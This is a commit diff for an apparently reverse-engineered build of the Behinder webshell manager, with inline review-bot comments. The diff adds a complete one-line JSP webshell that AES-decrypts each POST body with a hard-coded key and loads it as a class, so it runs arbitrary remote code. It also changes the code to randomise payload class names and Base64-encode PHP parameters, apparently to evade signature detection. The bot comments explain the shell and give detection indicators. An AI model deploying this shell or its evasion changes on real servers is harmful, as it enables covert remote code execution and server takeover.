更新V3.0 BETA9
zhanghaishan committed Apr 18, 2021
1 parent 577113d commit 898b8c7
Showing 53 changed files with 2,496 additions and 1,578 deletions.
1 change: 1 addition & 0 deletions README.md
@@ -3,6 +3,7 @@

# 更新内容
```
2021-04-19 逆向V3.0 Beta9
2021-04-11 逆向V3.0 Beta7 并且修复原版虚拟终端无法输入命令问题
```

23 changes: 23 additions & 0 deletions pom.xml
@@ -55,60 +55,69 @@
<groupId>org.openjfx</groupId>
<artifactId>javafx-controls</artifactId>
<version>11</version>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-media</artifactId>
<version>11</version>
<classifier>win</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-media</artifactId>
<version>11</version>
<classifier>mac</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-media</artifactId>
<version>11</version>
<classifier>linux</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-graphics</artifactId>
<version>11</version>
<classifier>win</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-graphics</artifactId>
<version>11</version>
<classifier>mac</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-graphics</artifactId>
<version>11</version>
<classifier>linux</classifier>
<scope>provided</scope>
</dependency>

<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-fxml</artifactId>
<version>11</version>
<scope>provided</scope>
</dependency>
<!-- https://mvnrepository.com/artifact/org.openjfx/javafx-web -->
<dependency>
<groupId>org.openjfx</groupId>
<artifactId>javafx-web</artifactId>
<version>11</version>
<scope>provided</scope>
</dependency>
<!-- https://mvnrepository.com/artifact/asm/asm-all -->
<dependency>
@@ -117,6 +126,20 @@
<version>3.2</version>
</dependency>

<!-- https://mvnrepository.com/artifact/org.javassist/javassist -->
<dependency>
<groupId>org.javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.27.0-GA</version>
</dependency>

<dependency>
<groupId>com.sun</groupId>
<artifactId>tools</artifactId>
<version>${maven.compiler.source}</version>
<scope>system</scope>
<systemPath>${env.JAVA_HOME}/lib/tools.jar</systemPath>
</dependency>
</dependencies>

<build>
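Review bot: The `com.sun:tools` dependency added at the end of `<dependencies>` uses `<scope>system</scope>` with `<systemPath>${env.JAVA_HOME}/lib/tools.jar</systemPath>`, so the build links against whatever jar the builder's environment variable points to, with no repository coordinates or checksum behind it. `tools.jar` was removed from the JDK in Java 9, while this POM also depends on OpenJFX 11, so the path likely does not resolve on the JDK those artifacts target; the value of `maven.compiler.source` is outside this hunk and should be checked. System scope is deprecated in Maven, so I would move this dependency into a profile activated only on JDK 1.8, or at least add `<!-- JDK 8 only: tools.jar is absent from JDK 9+ -->` above it.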
1 change: 1 addition & 0 deletions server/shell_java9.jsp
@@ -0,0 +1 @@
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
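Review bot: The new JSP is a single undocumented line, so a reader has to unpick it to see that every POST body is Base64-decoded, AES-decrypted with the hard-coded `k`, handed to `defineClass` and instantiated, which means the page runs caller-supplied bytecode inside the servlet container. The inline comment says `k` is derived from the default connection password, so the value is public in this repository and protects nothing on a host where the file is left as committed. For defenders scanning web roots, the fixed shapes here are usable static indicators: a `ClassLoader` subclass that exposes `defineClass`, `session.putValue("u",k)`, and a `Cipher` initialised in mode `2` from a string literal. The key value itself changes with the password. I would add a header comment stating what the page does, e.g. `<%-- Decrypts the POST body with k and loads the result as a class in this container. --%>`.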
2 changes: 1 addition & 1 deletion src/main/java/net/rebeyond/behinder/core/Constants.java
@@ -2,7 +2,7 @@

public class Constants {
public static String[] userAgents = new String[]{"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPod; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", 
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"};
public static String VERSION = "v3.0 Beta 7 ";
public static String VERSION = "v3.0 Beta 9 ";
public static int MENU_CUT = 1;
public static int MENU_COPY = 16;
public static int MENU_PASTE = 256;
39 changes: 38 additions & 1 deletion src/main/java/net/rebeyond/behinder/core/Params.java
@@ -7,6 +7,7 @@
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Random;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import net.rebeyond.behinder.utils.ReplacingInputStream;
@@ -32,10 +33,45 @@ public FieldVisitor visitField(int arg0, String filedName, String arg2, String a
}
}, 0);
byte[] result = cw.toByteArray();
String oldClassName = String.format("net/rebeyond/behinder/payload/java/%s", clsName);
String newClassName = getRandomClassName(oldClassName);
result = Utils.replaceBytes(result, Utils.mergeBytes(new byte[]{(byte)(oldClassName.length() + 2), 76}, oldClassName.getBytes()), Utils.mergeBytes(new byte[]{(byte)(newClassName.length() + 2), 76}, newClassName.getBytes()));
result = Utils.replaceBytes(result, Utils.mergeBytes(new byte[]{(byte)oldClassName.length()}, oldClassName.getBytes()), Utils.mergeBytes(new byte[]{(byte)newClassName.length()}, newClassName.getBytes()));
result[7] = 50;
return result;
}

private static String getRandomClassName(String sourceName) {
String[] domainAs = new String[]{"com", "net", "org", "sun"};
String domainB = Utils.getRandomAlpha((new Random()).nextInt(5) + 3).toLowerCase();
String domainC = Utils.getRandomAlpha((new Random()).nextInt(5) + 3).toLowerCase();
String domainD = Utils.getRandomAlpha((new Random()).nextInt(5) + 3).toLowerCase();
String className = Utils.getRandomAlpha((new Random()).nextInt(7) + 4);
className = className.substring(0, 1).toUpperCase() + className.substring(1).toLowerCase();
int domainAIndex = (new Random()).nextInt(4);
String domainA = domainAs[domainAIndex];
int randomSegments = (new Random()).nextInt(3) + 3;
String randomName;
switch(randomSegments) {
case 3:
randomName = domainA + "/" + domainB + "/" + className;
break;
case 4:
randomName = domainA + "/" + domainB + "/" + domainC + "/" + className;
break;
case 5:
randomName = domainA + "/" + domainB + "/" + domainC + "/" + domainD + "/" + className;
break;
default:
randomName = domainA + "/" + domainB + "/" + domainC + "/" + domainD + "/" + className;
}

while(randomName.length() > sourceName.length()) {
}

return randomName;
}

public static byte[] getParamedClassForPlugin(String payloadPath, final Map params) throws Exception {
ClassReader classReader = new ClassReader(Utils.getFileData(payloadPath));
ClassWriter cw = new ClassWriter(1);
@@ -127,7 +163,8 @@ public static byte[] getParamedPhp(String clsName, Map params) throws Exception
String paraName = (String)var9.next();
if (params.keySet().contains(paraName)) {
String paraValue = (String)params.get(paraName);
code.append(String.format("$%s=\"%s\";", paraName, paraValue));
paraValue = java.util.Base64.getEncoder().encodeToString(paraValue.getBytes());
code.append(String.format("$%s=\"%s\";$%s=base64_decode($%s);", paraName, paraValue, paraName, paraName));
paraList = paraList + ",$" + paraName;
} else {
code.append(String.format("$%s=\"%s\";", paraName, ""));
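Review bot: In `getRandomClassName` the loop `while(randomName.length() > sourceName.length()) { }` has an empty body, so whenever the generated name comes out longer than `sourceName` the calling thread spins forever instead of failing. A regeneration step was presumably lost (the file reads like decompiler output); a bounded fallback such as `if (randomName.length() > sourceName.length()) { return sourceName; }` would turn the hang into a visible no-op. The two `replaceBytes` calls also cast the name length to a single `byte`, which is only right while the high byte of the constant-pool length is zero, and a comment should say so. For anyone maintaining detections: the fixed `net/rebeyond/behinder/payload/java/` prefix is swapped out of the generated class bytes here, while `result[7] = 50` still pins the class-file major version. The method that calls `getRandomClassName` starts above this hunk.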